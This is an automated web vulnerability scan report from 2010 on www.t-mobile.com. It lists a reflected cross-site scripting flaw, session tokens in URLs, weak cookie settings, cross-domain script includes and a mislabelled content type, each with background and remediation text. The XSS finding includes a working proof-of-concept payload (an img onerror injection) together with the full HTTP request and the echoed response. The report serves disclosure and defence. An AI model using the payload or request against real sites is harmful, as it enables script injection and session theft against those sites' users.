Report generated by XSS.CX at Tue Nov 16 17:25:19 CST 2010.


Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler | MSRC Reference | GOOG Reference | CVE-2010-3486 | CVE-2010-3425

Loading

1. Cross-site scripting (reflected)

2. Session token in URL

2.1. http://www.t-mobile.com/

2.2. http://www.t-mobile.com/HtmlServices/ResourceBundler.ashx

2.3. http://www.t-mobile.com/assets/styles/master.css

3. Cookie scoped to parent domain

4. Cookie without HttpOnly flag set

5. Cross-domain script include

6. Content type incorrectly stated



1. Cross-site scripting (reflected)  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.t-mobile.com
Path:   /htmlservices/navigation/TMobileNavigation.ashx

Issue detail

The value of the currentURL request parameter is copied into the HTML document as plain text between tags. The payload 9bb23<img%20src%3da%20onerror%3dalert(1)>2107935286d was submitted in the currentURL parameter. This input was echoed as 9bb23<img src=a onerror=alert(1)>2107935286d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

Request

GET /htmlservices/navigation/TMobileNavigation.ashx?func=tmo&appId=myT&supportspanish=true&section=discover&currentURL=http%3A//mytouch.t-mobile.com/9bb23<img%20src%3da%20onerror%3dalert(1)>2107935286d&format=json&jsoncallback=jsonp1289944183438 HTTP/1.1
Accept: */*
Referer: http://mytouch.t-mobile.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.t-mobile.com
Proxy-Connection: Keep-Alive
Cookie: TMobileCommon=TeaId=6dcf9d25-d7ee-4205-bd86-efbdc788fe7e; TMobileSpanish=IsSpanishUser=false

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Date: Tue, 16 Nov 2010 21:51:03 GMT
Content-Length: 28452

jsonp1289944183438({"HeaderHTML":"<script charset=\"utf-8\" type=\"text/javascript\"> var mytmoUrl='https://my.t-mobile.com/Login/LoginController.aspx';<\/script><div><div id=\"brand\"><div id=\"logo\
...[SNIP]...
<a href=\"http://es.mytouch.t-mobile.com/enes/9bb23<img src=a onerror=alert(1)>2107935286d\" onclick=\"tm_spanish_setCookie('TMobileSpanish', 'IsSpanishUser=true');\">
...[SNIP]...

2. Session token in URL  previous  next
There are 3 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


2.1. http://www.t-mobile.com/  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.t-mobile.com
Path:   /

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET / HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.t-mobile.com
Cookie: TMobileCommon=TeaId=6dcf9d25-d7ee-4205-bd86-efbdc788fe7e; TMobileSpanish=IsSpanishUser=false

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Last-Modified: Mon, 01 Sep 1997 01:03:33 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=xa0vpc45zwaxqb45ce5bgs55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=xa0vpc45zwaxqb45ce5bgs55; path=/; HttpOnly
Set-Cookie: PartnerExpiration=PARTNER=!11%2f30%2f2010+9%3a51%3a46+PM; domain=.t-mobile.com; expires=Wed, 16-Nov-2011 21:51:46 GMT; path=/
Set-Cookie: TMobilePartner=; domain=.t-mobile.com; expires=Wed, 16-Nov-2005 21:51:46 GMT; path=/
Set-Cookie: PartnerExpiration=; domain=.t-mobile.com; expires=Wed, 16-Nov-2005 21:51:46 GMT; path=/
Set-Cookie: TMobileSession=WT=&DCS=; domain=.t-mobile.com; path=/
Date: Tue, 16 Nov 2010 21:51:46 GMT
Content-Length: 58751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><style type="text/css" media="
...[SNIP]...
</div>
<script charset="utf-8" type="text/javascript" src="http://www.t-mobile.com/HtmlServices/ResourceBundler.ashx?type=js&token=634255123062096207&url=/default.aspx"></script>
...[SNIP]...

2.2. http://www.t-mobile.com/HtmlServices/ResourceBundler.ashx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.t-mobile.com
Path:   /HtmlServices/ResourceBundler.ashx

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /HtmlServices/ResourceBundler.ashx?type=js&token=634255123048026837&url=/default.aspx HTTP/1.1
Accept: */*
Referer: http://www.t-mobile.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.t-mobile.com
Proxy-Connection: Keep-Alive
Cookie: TMobileCommon=TeaId=6dcf9d25-d7ee-4205-bd86-efbdc788fe7e; TMobileSpanish=IsSpanishUser=false; TMobileSession=WT=&DCS=; ASP.NET_SessionId=ezf2hr32te2rlynnuh0cgcmr

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/javascript
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Date: Tue, 16 Nov 2010 21:51:47 GMT
Content-Length: 84274

/* Contents of /htmlservices/assets/scripts/jquery-1.3.2.min.js */(function(){var W=this,ab,F=W.jQuery,S=W.$,T=W.jQuery=W.$=function(b,a){return new T.fn.init(b,a)},M=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]
...[SNIP]...

2.3. http://www.t-mobile.com/assets/styles/master.css  previous

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.t-mobile.com
Path:   /assets/styles/master.css

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /assets/styles/master.css?token=634250082036225832 HTTP/1.1
Accept: */*
Referer: http://www.t-mobile.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.t-mobile.com
Proxy-Connection: Keep-Alive
Cookie: TMobileCommon=TeaId=6dcf9d25-d7ee-4205-bd86-efbdc788fe7e; TMobileSpanish=IsSpanishUser=false; TMobileSession=WT=&DCS=; ASP.NET_SessionId=ezf2hr32te2rlynnuh0cgcmr

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age:1800
Content-Type: text/css
Last-Modified: Thu, 11 Nov 2010 01:50:03 GMT
Accept-Ranges: bytes
ETag: "285734c24281cb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Date: Tue, 16 Nov 2010 21:51:47 GMT
Content-Length: 158

... @import url(shell.css);@import url(layout.css);@import url(headandfoot.css);@import url(modules.css);@import url(poll.css);@import url(/css/tmobile2.css);

3. Cookie scoped to parent domain  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.t-mobile.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

Request

GET / HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.t-mobile.com
Cookie: TMobileCommon=TeaId=6dcf9d25-d7ee-4205-bd86-efbdc788fe7e; TMobileSpanish=IsSpanishUser=false

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Last-Modified: Mon, 01 Sep 1997 01:03:33 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=xa0vpc45zwaxqb45ce5bgs55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=xa0vpc45zwaxqb45ce5bgs55; path=/; HttpOnly
Set-Cookie: PartnerExpiration=PARTNER=!11%2f30%2f2010+9%3a51%3a46+PM; domain=.t-mobile.com; expires=Wed, 16-Nov-2011 21:51:46 GMT; path=/
Set-Cookie: TMobilePartner=; domain=.t-mobile.com; expires=Wed, 16-Nov-2005 21:51:46 GMT; path=/
Set-Cookie: PartnerExpiration=; domain=.t-mobile.com; expires=Wed, 16-Nov-2005 21:51:46 GMT; path=/
Set-Cookie: TMobileSession=WT=&DCS=; domain=.t-mobile.com; path=/
Date: Tue, 16 Nov 2010 21:51:46 GMT
Content-Length: 58751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><style type="text/css" media="
...[SNIP]...

4. Cookie without HttpOnly flag set  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.t-mobile.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

Request

GET / HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.t-mobile.com
Cookie: TMobileCommon=TeaId=6dcf9d25-d7ee-4205-bd86-efbdc788fe7e; TMobileSpanish=IsSpanishUser=false

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Last-Modified: Mon, 01 Sep 1997 01:03:33 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=xa0vpc45zwaxqb45ce5bgs55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=xa0vpc45zwaxqb45ce5bgs55; path=/; HttpOnly
Set-Cookie: PartnerExpiration=PARTNER=!11%2f30%2f2010+9%3a51%3a46+PM; domain=.t-mobile.com; expires=Wed, 16-Nov-2011 21:51:46 GMT; path=/
Set-Cookie: TMobilePartner=; domain=.t-mobile.com; expires=Wed, 16-Nov-2005 21:51:46 GMT; path=/
Set-Cookie: PartnerExpiration=; domain=.t-mobile.com; expires=Wed, 16-Nov-2005 21:51:46 GMT; path=/
Set-Cookie: TMobileSession=WT=&DCS=; domain=.t-mobile.com; path=/
Date: Tue, 16 Nov 2010 21:51:46 GMT
Content-Length: 58751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><style type="text/css" media="
...[SNIP]...

5. Cross-domain script include  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.t-mobile.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

Request

GET / HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.t-mobile.com
Cookie: TMobileCommon=TeaId=6dcf9d25-d7ee-4205-bd86-efbdc788fe7e; TMobileSpanish=IsSpanishUser=false

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Last-Modified: Mon, 01 Sep 1997 01:03:33 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=xa0vpc45zwaxqb45ce5bgs55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=xa0vpc45zwaxqb45ce5bgs55; path=/; HttpOnly
Set-Cookie: PartnerExpiration=PARTNER=!11%2f30%2f2010+9%3a51%3a46+PM; domain=.t-mobile.com; expires=Wed, 16-Nov-2011 21:51:46 GMT; path=/
Set-Cookie: TMobilePartner=; domain=.t-mobile.com; expires=Wed, 16-Nov-2005 21:51:46 GMT; path=/
Set-Cookie: PartnerExpiration=; domain=.t-mobile.com; expires=Wed, 16-Nov-2005 21:51:46 GMT; path=/
Set-Cookie: TMobileSession=WT=&DCS=; domain=.t-mobile.com; path=/
Date: Tue, 16 Nov 2010 21:51:46 GMT
Content-Length: 58751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><style type="text/css" media="
...[SNIP]...
<![endif]--><script type="text/javascript" src="http://s.tmocache.com/js/LivePersonChat.js"></script><script type="text/javascript" src="http://s.tmocache.com/js/LivePersonChat.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://s.tmocache.com/Js/Page.js"></script>
...[SNIP]...
<div id="page" class="home-nh page1">
<script type='text/javascript' src='http://s.tmocache.com/js/mbox.js'></script>
...[SNIP]...
</link>
<script type='text/javascript' src='http://s.tmocache.com/assets/scripts/jquery.qtip-1.0.0-rc3.js'></script>
<script type='text/javascript' src='http://s.tmocache.com/assets/scripts/jquery.Carousel360.js'></script>
<script type='text/javascript' src='http://s.tmocache.com/assets/scripts/master.js'></script>
<script type='text/javascript' src='http://s.tmocache.com/assets/scripts/swfobject.js'></script>
<script type='text/javascript' src='http://s.tmocache.com/assets/scripts/noncookiedflash.js'></script>
<script type='text/javascript' src='http://s.tmocache.com/assets/scripts/jquery.marqueeSlider.min.js'></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://cdn.mercent.com/js/tracker.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//libs.coremetrics.com/eluminate.js"></script>
...[SNIP]...

6. Content type incorrectly stated  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.t-mobile.com
Path:   /htmlservices/navigation/TMobileNavigation.ashx

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain CSS.

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /htmlservices/navigation/TMobileNavigation.ashx?func=tmo&appId=myT&supportspanish=true&section=discover&currentURL=http%3A//mytouch.t-mobile.com/&format=json&jsoncallback=jsonp1289944183438 HTTP/1.1
Accept: */*
Referer: http://mytouch.t-mobile.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.t-mobile.com
Proxy-Connection: Keep-Alive
Cookie: TMobileCommon=TeaId=6dcf9d25-d7ee-4205-bd86-efbdc788fe7e; TMobileSpanish=IsSpanishUser=false

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Date: Tue, 16 Nov 2010 21:50:24 GMT
Content-Length: 28328

jsonp1289944183438({"HeaderHTML":"<script charset=\"utf-8\" type=\"text/javascript\"> var mytmoUrl='https://my.t-mobile.com/Login/LoginController.aspx';<\/script><div><div id=\"brand\"><div id=\"logo\
...[SNIP]...

Report generated by XSS.CX at Tue Nov 16 17:25:19 CST 2010.